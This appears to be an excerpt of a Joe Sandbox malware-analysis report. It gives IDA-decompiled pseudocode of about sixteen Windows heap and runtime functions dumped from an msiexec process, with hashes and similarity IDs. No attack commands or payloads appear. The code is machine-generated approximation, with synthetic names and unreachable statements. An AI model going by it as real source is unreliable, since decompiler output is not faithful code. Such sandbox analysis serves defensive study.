                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5b413d8b48e802be979cd21c1c68c9e08b3e40a9871acdf7d38ce8e38d0fdd7d
                              • Instruction ID: f957dd7014b47c163bc63e0818b2a0ab99f518bb5d641274aa52b53e23eccf5d
                              • Opcode Fuzzy Hash: 5b413d8b48e802be979cd21c1c68c9e08b3e40a9871acdf7d38ce8e38d0fdd7d
                              • Instruction Fuzzy Hash: 55F06271E00258EFDB14DFA9D505E6EB7F4EF54300F444059E905EB381E634E900CB54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04D2C577(void* __ecx, char _a4) {
                              				void* __esi;
                              				void* __ebp;
                              				void* _t17;
                              				void* _t19;
                              				void* _t20;
                              				void* _t21;
                              
                              				_t18 = __ecx;
                              				_t21 = __ecx;
                              				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E04D2C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x4ce11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                              					__eflags = _a4;
                              					if(__eflags != 0) {
                              						L10:
                              						E04DD88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                              						L9:
                              						return 0;
                              					}
                              					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                              					if(__eflags == 0) {
                              						goto L10;
                              					}
                              					goto L9;
                              				} else {
                              					return 1;
                              				}
                              			}










                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 49c32de8a85aac9e5c44ce4f5d99d68dcdfe484e56f05cee7a6e8ea53ec73d8d
                              • Instruction ID: 9c2a8790ab506d1f8e5d571fd03f61dcc67194d0d6f1dd4588e68eccc24faf92
                              • Opcode Fuzzy Hash: 49c32de8a85aac9e5c44ce4f5d99d68dcdfe484e56f05cee7a6e8ea53ec73d8d
                              • Instruction Fuzzy Hash: A0F090B2A356B29EE7369B14C20CB2A7BD4AB25F7CF484466E45587105D6A4FC80C261
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 43%
                              			E04DD8D34(intOrPtr __ecx, intOrPtr __edx) {
                              				signed int _v8;
                              				intOrPtr _v12;
                              				intOrPtr _v16;
                              				short _v42;
                              				char _v48;
                              				signed char* _t12;
                              				intOrPtr _t18;
                              				intOrPtr _t24;
                              				intOrPtr _t25;
                              				signed int _t26;
                              
                              				_t23 = __edx;
                              				_v8 =  *0x4dfd360 ^ _t26;
                              				_v16 = __ecx;
                              				_v42 = 0x1c2b;
                              				_v12 = __edx;
                              				if(E04D27D50() == 0) {
                              					_t12 = 0x7ffe0386;
                              				} else {
                              					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                              				}
                              				_push( &_v48);
                              				_push(8);
                              				_push(0x20402);
                              				_push( *_t12 & 0x000000ff);
                              				return E04D4B640(E04D49AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                              			}














                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1d0408dcca8d5fcc7c23f64d0a4029bd8b109f31da998c2f5ce42094aaa25d83
                              • Instruction ID: d5255a2e9ca51e8ceed6f1517674a016e89424dc1b065526d4935e50252ff634
                              • Opcode Fuzzy Hash: 1d0408dcca8d5fcc7c23f64d0a4029bd8b109f31da998c2f5ce42094aaa25d83
                              • Instruction Fuzzy Hash: 43F09070E046089FDB14EBB8D542B6E77B4EB54704F508099E916AB281EA34E9009764
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E04DC2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                              				void* __esi;
                              				signed char _t3;
                              				signed char _t7;
                              				void* _t19;
                              
                              				_t17 = __ecx;
                              				_t3 = E04DBFD22(__ecx);
                              				_t19 =  *0x4df849c - _t3; // 0x637a23c5
                              				if(_t19 == 0) {
                              					__eflags = _t17 -  *0x4df8748; // 0x0
                              					if(__eflags <= 0) {
                              						E04DC1C06();
                              						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                              						__eflags = _t3;
                              						if(_t3 != 0) {
                              							L5:
                              							__eflags =  *0x4df8724 & 0x00000004;
                              							if(( *0x4df8724 & 0x00000004) == 0) {
                              								asm("int3");
                              								return _t3;
                              							}
                              						} else {
                              							_t3 =  *0x7ffe02d4 & 0x00000003;
                              							__eflags = _t3 - 3;
                              							if(_t3 == 3) {
                              								goto L5;
                              							}
                              						}
                              					}
                              					return _t3;
                              				} else {
                              					_t7 =  *0x4df8724; // 0x0
                              					return E04DB8DF1(__ebx, 0xc0000374, 0x4df5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                              				}
                              			}








                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 31d01acf324e4f4faad528f4763707f7b1fc08dcf927f0509ed5438fbe594f0a
                              • Instruction ID: c4e246aaefa7e54abefdc8b458a4e72cb7b73b42329405a3d5cb82d5807030d9
                              • Opcode Fuzzy Hash: 31d01acf324e4f4faad528f4763707f7b1fc08dcf927f0509ed5438fbe594f0a
                              • Instruction Fuzzy Hash: B3F02726E115868AEF32BF2575203D16F90E745318F0904CFF89017701C638AC83FE61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 54%
                              			E04D4927A(void* __ecx) {
                              				signed int _t11;
                              				void* _t14;
                              
                              				_t11 = L04D24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                              				if(_t11 != 0) {
                              					E04D4FA60(_t11, 0, 0x98);
                              					asm("movsd");
                              					asm("movsd");
                              					asm("movsd");
                              					asm("movsd");
                              					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                              					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                              					E04D492C6(_t11, _t14);
                              				}
                              				return _t11;
                              			}






                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                              • Instruction ID: ad52b99ec4bc82275afc475b3f3f575c376a601f1946b195dae09290f50a2112
                              • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                              • Instruction Fuzzy Hash: 05E06D723406406BE7219F5ADCD4B5776A9EFC2729F0440B9B9045E292CAE6E9098BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 36%
                              			E04DD8CD6(intOrPtr __ecx) {
                              				signed int _v8;
                              				intOrPtr _v12;
                              				short _v38;
                              				char _v44;
                              				signed char* _t11;
                              				intOrPtr _t17;
                              				intOrPtr _t22;
                              				intOrPtr _t23;
                              				intOrPtr _t24;
                              				signed int _t25;
                              
                              				_v8 =  *0x4dfd360 ^ _t25;
                              				_v12 = __ecx;
                              				_v38 = 0x1c2d;
                              				if(E04D27D50() == 0) {
                              					_t11 = 0x7ffe0386;
                              				} else {
                              					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                              				}
                              				_push( &_v44);
                              				_push(0xffffffe4);
                              				_push(0x402);
                              				_push( *_t11 & 0x000000ff);
                              				return E04D4B640(E04D49AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                              			}














                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d36ea1034f1c9117015c1dff07bb151c68db34bebb4bcffb92ca22891bbfbf94
                              • Instruction ID: 53bfed6e6c28416442f2c8299683631b12fa3b60f709e7392651262185cc6406
                              • Opcode Fuzzy Hash: d36ea1034f1c9117015c1dff07bb151c68db34bebb4bcffb92ca22891bbfbf94
                              • Instruction Fuzzy Hash: 13F08270A04248AFDB04EBB9D956E6E77B8EF58304F50019AF916EB3C1EA34E900D764
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 88%
                              			E04D2746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                              				signed int _t8;
                              				void* _t10;
                              				short* _t17;
                              				void* _t19;
                              				intOrPtr _t20;
                              				void* _t21;
                              
                              				_t20 = __esi;
                              				_t19 = __edi;
                              				_t17 = __ebx;
                              				if( *((char*)(_t21 - 0x25)) != 0) {
                              					if(__ecx == 0) {
                              						E04D1EB70(__ecx, 0x4df79a0);
                              					} else {
                              						asm("lock xadd [ecx], eax");
                              						if((_t8 | 0xffffffff) == 0) {
                              							_push( *((intOrPtr*)(__ecx + 4)));
                              							E04D495D0();
                              							L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                              							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                              							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                              						}
                              					}
                              					L10:
                              				}
                              				_t10 = _t19 + _t19;
                              				if(_t20 >= _t10) {
                              					if(_t19 != 0) {
                              						 *_t17 = 0;
                              						return 0;
                              					}
                              				}
                              				return _t10;
                              				goto L10;
                              			}










                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 72543fb72746d986854a30646ff8469284df3ceb0b1531d0a33e4fb13059fefb
                              • Instruction ID: 9613e11f43787ffb1b2a834dfbf7394dcb6a51827b8152fb59416780d137a9a8
                              • Opcode Fuzzy Hash: 72543fb72746d986854a30646ff8469284df3ceb0b1531d0a33e4fb13059fefb
                              • Instruction Fuzzy Hash: 9BF0B434B44964ABDF219B68CA40B797BA1BF2531CF040256D891AB160F724F8028795
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04D04F2E(void* __ecx, char _a4) {
                              				void* __esi;
                              				void* __ebp;
                              				void* _t17;
                              				void* _t19;
                              				void* _t20;
                              				void* _t21;
                              
                              				_t18 = __ecx;
                              				_t21 = __ecx;
                              				if(__ecx == 0) {
                              					L6:
                              					__eflags = _a4;
                              					if(__eflags != 0) {
                              						L8:
                              						E04DD88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                              						L9:
                              						return 0;
                              					}
                              					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                              					if(__eflags != 0) {
                              						goto L9;
                              					}
                              					goto L8;
                              				}
                              				_t18 = __ecx + 0x30;
                              				if(E04D2C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4ce1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                              					goto L6;
                              				} else {
                              					return 1;
                              				}
                              			}










                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c2657a0150dbe9f97f2dce8c61382ceada34d05b63c94ec63c44e860cd75cefa
                              • Instruction ID: ddf8be8dc0243342ff1f4c568abe6b62babaa4f473b086dcd9465a36c6e84939
                              • Opcode Fuzzy Hash: c2657a0150dbe9f97f2dce8c61382ceada34d05b63c94ec63c44e860cd75cefa
                              • Instruction Fuzzy Hash: 8CF0BE32A256948FE762DB1CC184B26B7D8FB017B8F048465D40787920C724FC44C654
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 36%
                              			E04DD8B58(intOrPtr __ecx) {
                              				signed int _v8;
                              				intOrPtr _v20;
                              				short _v46;
                              				char _v52;
                              				signed char* _t11;
                              				intOrPtr _t17;
                              				intOrPtr _t22;
                              				intOrPtr _t23;
                              				intOrPtr _t24;
                              				signed int _t25;
                              
                              				_v8 =  *0x4dfd360 ^ _t25;
                              				_v20 = __ecx;
                              				_v46 = 0x1c26;
                              				if(E04D27D50() == 0) {
                              					_t11 = 0x7ffe0386;
                              				} else {
                              					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                              				}
                              				_push( &_v52);
                              				_push(4);
                              				_push(0x402);
                              				_push( *_t11 & 0x000000ff);
                              				return E04D4B640(E04D49AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                              			}














                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 20d799ead46bd3711dae0b1103014c59aa7082d6cafaa36cb6bc4d0b2dacaf07
                              • Instruction ID: 506b00a78d621607705cc744000280ff4a06060055b9c1d331276f7b48026458
                              • Opcode Fuzzy Hash: 20d799ead46bd3711dae0b1103014c59aa7082d6cafaa36cb6bc4d0b2dacaf07
                              • Instruction Fuzzy Hash: 86F089B0B042589BDB10EBB4D516E6E77B4EF44304F440459B915DB3C1EA74E900D754
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04D3A44B(signed int __ecx) {
                              				intOrPtr _t13;
                              				signed int _t15;
                              				signed int* _t16;
                              				signed int* _t17;
                              
                              				_t13 =  *0x4df7b9c; // 0x0
                              				_t15 = __ecx;
                              				_t16 = L04D24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                              				if(_t16 == 0) {
                              					return 0;
                              				}
                              				 *_t16 = _t15;
                              				_t17 =  &(_t16[2]);
                              				E04D4FA60(_t17, 0, _t15 << 2);
                              				return _t17;
                              			}








                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c2bf8c9fb3e2880d2aeeb2caab186fe9495f037a192430f0f59350465f4d4354
                              • Instruction ID: cfe4b46c728965cfb5313811f63d9f1b270c529da149704c93538916bb0afb91
                              • Opcode Fuzzy Hash: c2bf8c9fb3e2880d2aeeb2caab186fe9495f037a192430f0f59350465f4d4354
                              • Instruction Fuzzy Hash: 8DE09272B01421ABE2219B18EC00FA673ADEBE5656F094039E948C7354D628ED01C7E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 79%
                              			E04D0F358(void* __ecx, signed int __edx) {
                              				char _v8;
                              				signed int _t9;
                              				void* _t20;
                              
                              				_push(__ecx);
                              				_t9 = 2;
                              				_t20 = 0;
                              				if(E04D3F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                              					_t20 = L04D24620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                              				}
                              				return _t20;
                              			}







                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                              • Instruction ID: 17abc21cb0f4491aa914d157e8a26ac689138370b4d1d0351d57f6e1e4fc4b81
                              • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                              • Instruction Fuzzy Hash: 13E0D832A41218BBDF3197D99E05F9ABBACDB44B61F104159F904D7190D561AE00C6D0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04D1FF60(intOrPtr _a4) {
                              				void* __ecx;
                              				void* __ebp;
                              				void* _t13;
                              				intOrPtr _t14;
                              				void* _t15;
                              				void* _t16;
                              				void* _t17;
                              
                              				_t14 = _a4;
                              				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x4ce11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                              					return E04DD88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                              				} else {
                              					return E04D20050(_t14);
                              				}
                              			}











                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8a2f98eb919aaf1029673655775c936b68796eede27bb58f8871dda0ad37e017
                              • Instruction ID: 0c75d30d99c7ad47956a18846e4f4b8934f152789b16801a95f6390a001501ab
                              • Opcode Fuzzy Hash: 8a2f98eb919aaf1029673655775c936b68796eede27bb58f8871dda0ad37e017
                              • Instruction Fuzzy Hash: 60E0DFB1309205AFE735DB52F140F293B98FB42729F19801FF80A4B121C662F888C216
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 82%
                              			E04D941E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                              				void* _t5;
                              				void* _t14;
                              
                              				_push(8);
                              				_push(0x4de08f0);
                              				_t5 = E04D5D08C(__ebx, __edi, __esi);
                              				if( *0x4df87ec == 0) {
                              					E04D1EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                              					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                              					if( *0x4df87ec == 0) {
                              						 *0x4df87f0 = 0x4df87ec;
                              						 *0x4df87ec = 0x4df87ec;
                              						 *0x4df87e8 = 0x4df87e4;
                              						 *0x4df87e4 = 0x4df87e4;
                              					}
                              					 *(_t14 - 4) = 0xfffffffe;
                              					_t5 = L04D94248();
                              				}
                              				return E04D5D0D1(_t5);
                              			}






                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1d810b451e01aa8d9e8766da8a757b81f3ae1476197d3191e7faf8a57b70cf60
                              • Instruction ID: 621170aef587da182a5f5dcdfe53f87026370b376c03f8bd296ab286bdba5439
                              • Opcode Fuzzy Hash: 1d810b451e01aa8d9e8766da8a757b81f3ae1476197d3191e7faf8a57b70cf60
                              • Instruction Fuzzy Hash: 6AF0F274A11B009EEBB0FFAAA52071436B4F744328F10812AA50086394C7786886EF22
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04DBD380(void* __ecx, void* __edx, intOrPtr _a4) {
                              				void* _t5;
                              
                              				if(_a4 != 0) {
                              					_t5 = L04D0E8B0(__ecx, _a4, 0xfff);
                              					L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                              					return _t5;
                              				}
                              				return 0xc000000d;
                              			}





                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                              • Instruction ID: 7eed117416a620f7296770501c23ca6ec87b3bfe65149ea44226b32428a5e09e
                              • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                              • Instruction Fuzzy Hash: 0EE08C31380614EBEB225E44CC00BA97B16EB907A4F104031FE495B791C679EC91E6E4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04D3A185() {
                              				void* __ecx;
                              				intOrPtr* _t5;
                              
                              				if( *0x4df67e4 >= 0xa) {
                              					if(_t5 < 0x4df6800 || _t5 >= 0x4df6900) {
                              						return L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                              					} else {
                              						goto L1;
                              					}
                              				} else {
                              					L1:
                              					return E04D20010(0x4df67e0, _t5);
                              				}
                              			}






                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1502e42d56e91466e9bf2fa4224577224a57c726924c4e4938c0d5aae6833e9c
                              • Instruction ID: 5df64d0bc6f5e97d50a79a9f4f3f26b9be34cf77dace0a88f3076296c3f4934c
                              • Opcode Fuzzy Hash: 1502e42d56e91466e9bf2fa4224577224a57c726924c4e4938c0d5aae6833e9c
                              • Instruction Fuzzy Hash: 49D02B2132000026F63D9710AE14B2122E2E7D070DF310C0DF3431BF94DA50FCD28158
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04D316E0(void* __edx, void* __eflags) {
                              				void* __ecx;
                              				void* _t3;
                              
                              				_t3 = E04D31710(0x4df67e0);
                              				if(_t3 == 0) {
                              					_t6 =  *[fs:0x30];
                              					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                              						goto L1;
                              					} else {
                              						return L04D24620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                              					}
                              				} else {
                              					L1:
                              					return _t3;
                              				}
                              			}






                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d389ef434b80bf77b0992fb72529dc0629e554a05b006bc9ad932c2fc6eec58b
                              • Instruction ID: 567df53c5cf24940856f466340aac40c8c87af1eadddd38ea7dc36dd666e8514
                              • Opcode Fuzzy Hash: d389ef434b80bf77b0992fb72529dc0629e554a05b006bc9ad932c2fc6eec58b
                              • Instruction Fuzzy Hash: 20D0A77220010192FA2D5B119C04B183251EBD078BF38006CF207598C0CFA0FD92E458
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04D853CA(void* __ebx) {
                              				intOrPtr _t7;
                              				void* _t13;
                              				void* _t14;
                              				intOrPtr _t15;
                              				void* _t16;
                              
                              				_t13 = __ebx;
                              				if( *((char*)(_t16 - 0x65)) != 0) {
                              					E04D1EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                              					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                              					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                              				}
                              				if(_t15 != 0) {
                              					L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                              					return  *((intOrPtr*)(_t16 - 0x64));
                              				}
                              				return _t7;
                              			}









                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                              • Instruction ID: 2f54786f9c957dab6c4dbba5611a11e6840f36a541abdae85ef61a8494e8189d
                              • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                              • Instruction Fuzzy Hash: 9BE08C35A00680ABCF12EB48C660F5EB7F5FB44B00F140008A4085B660C624BC00CB40
